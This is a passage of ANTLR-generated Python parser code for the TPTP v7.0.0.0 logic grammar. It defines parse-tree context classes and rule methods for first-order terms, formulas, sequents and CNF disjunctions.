self.parser = parser
def fof_defined_plain_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_defined_plain_formulaContext,0)
def fof_defined_infix_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_defined_infix_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_defined_atomic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_defined_atomic_formula" ):
listener.enterFof_defined_atomic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_defined_atomic_formula" ):
listener.exitFof_defined_atomic_formula(self)
def fof_defined_atomic_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_defined_atomic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 206, self.RULE_fof_defined_atomic_formula)
try:
self.state = 1150
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,75,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1148
self.fof_defined_plain_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1149
self.fof_defined_infix_formula()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_defined_plain_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_defined_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_defined_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_defined_plain_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_defined_plain_formula" ):
listener.enterFof_defined_plain_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_defined_plain_formula" ):
listener.exitFof_defined_plain_formula(self)
def fof_defined_plain_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_defined_plain_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 208, self.RULE_fof_defined_plain_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1152
self.fof_defined_term()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_defined_infix_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_term(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_termContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_termContext,i)
def defined_infix_pred(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_infix_predContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_defined_infix_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_defined_infix_formula" ):
listener.enterFof_defined_infix_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_defined_infix_formula" ):
listener.exitFof_defined_infix_formula(self)
def fof_defined_infix_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_defined_infix_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 210, self.RULE_fof_defined_infix_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1154
self.fof_term()
self.state = 1155
self.defined_infix_pred()
self.state = 1156
self.fof_term()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_system_atomic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_system_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_system_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_system_atomic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_system_atomic_formula" ):
listener.enterFof_system_atomic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_system_atomic_formula" ):
listener.exitFof_system_atomic_formula(self)
def fof_system_atomic_formula(self):
localctx = tptp_v7_0_0_0Parser.Fof_system_atomic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 212, self.RULE_fof_system_atomic_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1158
self.fof_system_term()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_plain_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def constant(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.ConstantContext,0)
def functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.FunctorContext,0)
def fof_arguments(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_argumentsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_plain_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_plain_term" ):
listener.enterFof_plain_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_plain_term" ):
listener.exitFof_plain_term(self)
def fof_plain_term(self):
localctx = tptp_v7_0_0_0Parser.Fof_plain_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 214, self.RULE_fof_plain_term)
try:
self.state = 1166
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,76,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1160
self.constant()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1161
self.functor()
self.state = 1162
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1163
self.fof_arguments()
self.state = 1164
self.match(tptp_v7_0_0_0Parser.T__10)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_defined_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def defined_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_termContext,0)
def fof_defined_atomic_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_defined_atomic_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_defined_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_defined_term" ):
listener.enterFof_defined_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_defined_term" ):
listener.exitFof_defined_term(self)
def fof_defined_term(self):
localctx = tptp_v7_0_0_0Parser.Fof_defined_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 216, self.RULE_fof_defined_term)
try:
self.state = 1170
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 1)
self.state = 1168
self.defined_term()
pass
elif token in [tptp_v7_0_0_0Parser.Dollar_word]:
self.enterOuterAlt(localctx, 2)
self.state = 1169
self.fof_defined_atomic_term()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_defined_atomic_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_defined_plain_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_defined_plain_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_defined_atomic_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_defined_atomic_term" ):
listener.enterFof_defined_atomic_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_defined_atomic_term" ):
listener.exitFof_defined_atomic_term(self)
def fof_defined_atomic_term(self):
localctx = tptp_v7_0_0_0Parser.Fof_defined_atomic_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 218, self.RULE_fof_defined_atomic_term)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1172
self.fof_defined_plain_term()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_defined_plain_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def defined_constant(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_constantContext,0)
def defined_functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Defined_functorContext,0)
def fof_arguments(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_argumentsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_defined_plain_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_defined_plain_term" ):
listener.enterFof_defined_plain_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_defined_plain_term" ):
listener.exitFof_defined_plain_term(self)
def fof_defined_plain_term(self):
localctx = tptp_v7_0_0_0Parser.Fof_defined_plain_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 220, self.RULE_fof_defined_plain_term)
try:
self.state = 1180
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,78,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1174
self.defined_constant()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1175
self.defined_functor()
self.state = 1176
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1177
self.fof_arguments()
self.state = 1178
self.match(tptp_v7_0_0_0Parser.T__10)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_system_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def system_constant(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.System_constantContext,0)
def system_functor(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.System_functorContext,0)
def fof_arguments(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_argumentsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_system_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_system_term" ):
listener.enterFof_system_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_system_term" ):
listener.exitFof_system_term(self)
def fof_system_term(self):
localctx = tptp_v7_0_0_0Parser.Fof_system_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 222, self.RULE_fof_system_term)
try:
self.state = 1188
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,79,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 1182
self.system_constant()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 1183
self.system_functor()
self.state = 1184
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1185
self.fof_arguments()
self.state = 1186
self.match(tptp_v7_0_0_0Parser.T__10)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_argumentsContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_term(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_termContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_termContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_arguments
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_arguments" ):
listener.enterFof_arguments(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_arguments" ):
listener.exitFof_arguments(self)
def fof_arguments(self):
localctx = tptp_v7_0_0_0Parser.Fof_argumentsContext(self, self._ctx, self.state)
self.enterRule(localctx, 224, self.RULE_fof_arguments)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1190
self.fof_term()
self.state = 1195
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1191
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1192
self.fof_term()
self.state = 1197
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_function_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_function_termContext,0)
def variable(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.VariableContext,0)
def tff_conditional_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_conditional_termContext,0)
def tff_let_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_termContext,0)
def tff_tuple_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_tuple_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_term" ):
listener.enterFof_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_term" ):
listener.exitFof_term(self)
def fof_term(self):
localctx = tptp_v7_0_0_0Parser.Fof_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 226, self.RULE_fof_term)
try:
self.state = 1203
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 1)
self.state = 1198
self.fof_function_term()
pass
elif token in [tptp_v7_0_0_0Parser.Upper_word]:
self.enterOuterAlt(localctx, 2)
self.state = 1199
self.variable()
pass
elif token in [tptp_v7_0_0_0Parser.T__23]:
self.enterOuterAlt(localctx, 3)
self.state = 1200
self.tff_conditional_term()
pass
elif token in [tptp_v7_0_0_0Parser.T__24, tptp_v7_0_0_0Parser.T__25]:
self.enterOuterAlt(localctx, 4)
self.state = 1201
self.tff_let_term()
pass
elif token in [tptp_v7_0_0_0Parser.T__17, tptp_v7_0_0_0Parser.T__18]:
self.enterOuterAlt(localctx, 5)
self.state = 1202
self.tff_tuple_term()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_function_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_plain_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_plain_termContext,0)
def fof_defined_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_defined_termContext,0)
def fof_system_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_system_termContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_function_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_function_term" ):
listener.enterFof_function_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_function_term" ):
listener.exitFof_function_term(self)
def fof_function_term(self):
localctx = tptp_v7_0_0_0Parser.Fof_function_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 228, self.RULE_fof_function_term)
try:
self.state = 1208
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted]:
self.enterOuterAlt(localctx, 1)
self.state = 1205
self.fof_plain_term()
pass
elif token in [tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 2)
self.state = 1206
self.fof_defined_term()
pass
elif token in [tptp_v7_0_0_0Parser.Dollar_dollar_word]:
self.enterOuterAlt(localctx, 3)
self.state = 1207
self.fof_system_term()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_conditional_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_logic_formulaContext,0)
def fof_term(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_termContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_termContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_conditional_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_conditional_term" ):
listener.enterTff_conditional_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_conditional_term" ):
listener.exitTff_conditional_term(self)
def tff_conditional_term(self):
localctx = tptp_v7_0_0_0Parser.Tff_conditional_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 230, self.RULE_tff_conditional_term)
try:
self.enterOuterAlt(localctx, 1)
self.state = 1210
self.match(tptp_v7_0_0_0Parser.T__23)
self.state = 1211
self.tff_logic_formula()
self.state = 1212
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1213
self.fof_term()
self.state = 1214
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1215
self.fof_term()
self.state = 1216
self.match(tptp_v7_0_0_0Parser.T__10)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_let_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_let_formula_defns(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_formula_defnsContext,0)
def fof_term(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_termContext,0)
def tff_let_term_defns(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_let_term_defnsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_let_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_let_term" ):
listener.enterTff_let_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_let_term" ):
listener.exitTff_let_term(self)
def tff_let_term(self):
localctx = tptp_v7_0_0_0Parser.Tff_let_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 232, self.RULE_tff_let_term)
try:
self.state = 1230
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__24]:
self.enterOuterAlt(localctx, 1)
self.state = 1218
self.match(tptp_v7_0_0_0Parser.T__24)
self.state = 1219
self.tff_let_formula_defns()
self.state = 1220
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1221
self.fof_term()
self.state = 1222
self.match(tptp_v7_0_0_0Parser.T__10)
pass
elif token in [tptp_v7_0_0_0Parser.T__25]:
self.enterOuterAlt(localctx, 2)
self.state = 1224
self.match(tptp_v7_0_0_0Parser.T__25)
self.state = 1225
self.tff_let_term_defns()
self.state = 1226
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1227
self.fof_term()
self.state = 1228
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_tuple_termContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_arguments(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_argumentsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_tuple_term
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_tuple_term" ):
listener.enterTff_tuple_term(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_tuple_term" ):
listener.exitTff_tuple_term(self)
def tff_tuple_term(self):
localctx = tptp_v7_0_0_0Parser.Tff_tuple_termContext(self, self._ctx, self.state)
self.enterRule(localctx, 234, self.RULE_tff_tuple_term)
try:
self.state = 1237
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__17]:
self.enterOuterAlt(localctx, 1)
self.state = 1232
self.match(tptp_v7_0_0_0Parser.T__17)
pass
elif token in [tptp_v7_0_0_0Parser.T__18]:
self.enterOuterAlt(localctx, 2)
self.state = 1233
self.match(tptp_v7_0_0_0Parser.T__18)
self.state = 1234
self.fof_arguments()
self.state = 1235
self.match(tptp_v7_0_0_0Parser.T__19)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_sequentContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_formula_tuple(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_formula_tupleContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_formula_tupleContext,i)
def Gentzen_arrow(self):
return self.getToken(tptp_v7_0_0_0Parser.Gentzen_arrow, 0)
def fof_sequent(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_sequentContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_sequent
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_sequent" ):
listener.enterFof_sequent(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_sequent" ):
listener.exitFof_sequent(self)
def fof_sequent(self):
localctx = tptp_v7_0_0_0Parser.Fof_sequentContext(self, self._ctx, self.state)
self.enterRule(localctx, 236, self.RULE_fof_sequent)
try:
self.state = 1247
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__11, tptp_v7_0_0_0Parser.T__16]:
self.enterOuterAlt(localctx, 1)
self.state = 1239
self.fof_formula_tuple()
self.state = 1240
self.match(tptp_v7_0_0_0Parser.Gentzen_arrow)
self.state = 1241
self.fof_formula_tuple()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 1243
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1244
self.fof_sequent()
self.state = 1245
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_formula_tupleContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_formula_tuple_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_formula_tuple_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_formula_tuple
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_formula_tuple" ):
listener.enterFof_formula_tuple(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_formula_tuple" ):
listener.exitFof_formula_tuple(self)
def fof_formula_tuple(self):
localctx = tptp_v7_0_0_0Parser.Fof_formula_tupleContext(self, self._ctx, self.state)
self.enterRule(localctx, 238, self.RULE_fof_formula_tuple)
try:
self.state = 1254
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__16]:
self.enterOuterAlt(localctx, 1)
self.state = 1249
self.match(tptp_v7_0_0_0Parser.T__16)
pass
elif token in [tptp_v7_0_0_0Parser.T__11]:
self.enterOuterAlt(localctx, 2)
self.state = 1250
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 1251
self.fof_formula_tuple_list()
self.state = 1252
self.match(tptp_v7_0_0_0Parser.T__12)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Fof_formula_tuple_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_logic_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Fof_logic_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_logic_formulaContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_fof_formula_tuple_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterFof_formula_tuple_list" ):
listener.enterFof_formula_tuple_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitFof_formula_tuple_list" ):
listener.exitFof_formula_tuple_list(self)
def fof_formula_tuple_list(self):
localctx = tptp_v7_0_0_0Parser.Fof_formula_tuple_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 240, self.RULE_fof_formula_tuple_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 1256
self.fof_logic_formula()
self.state = 1261
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 1257
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 1258
self.fof_logic_formula()
self.state = 1263
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Cnf_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def cnf_disjunction(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Cnf_disjunctionContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_cnf_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterCnf_formula" ):
listener.enterCnf_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitCnf_formula" ):
listener.exitCnf_formula(self)
def cnf_formula(self):
localctx = tptp_v7_0_0_0Parser.Cnf_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 242, self.RULE_cnf_formula)
try:
self.state = 1269
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__17, tptp_v7_0_0_0Parser.T__18, tptp_v7_0_0_0Parser.T__23, tptp_v7_0_0_0Parser.T__24, tptp_v7_0_0_0Parser.T__25, tptp_v7_0_0_0Parser.Not, tptp_v7_0_0_0Parser.Real, tptp_v7_0_0_0Parser.Rational, tptp_v7_0_0_0Parser.Integer, tptp_v7_0_0_0Parser.Dollar_word, tptp_v7_0_0_0Parser.Dollar_dollar_word, tptp_v7_0_0_0Parser.Upper_word, tptp_v7_0_0_0Parser.Lower_word, tptp_v7_0_0_0Parser.Single_quoted, tptp_v7_0_0_0Parser.Distinct_object]:
self.enterOuterAlt(localctx, 1)
self.state = 1264
self.cnf_disjunction(0)
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 1265
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 1266
self.cnf_disjunction(0)
self.state = 1267
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Cnf_disjunctionContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def cnf_literal(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Cnf_literalContext,0)
def cnf_disjunction(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Cnf_disjunctionContext,0)
def Or(self):
return self.getToken(tptp_v7_0_0_0Parser.Or, 0)
def getRuleIndex(self):
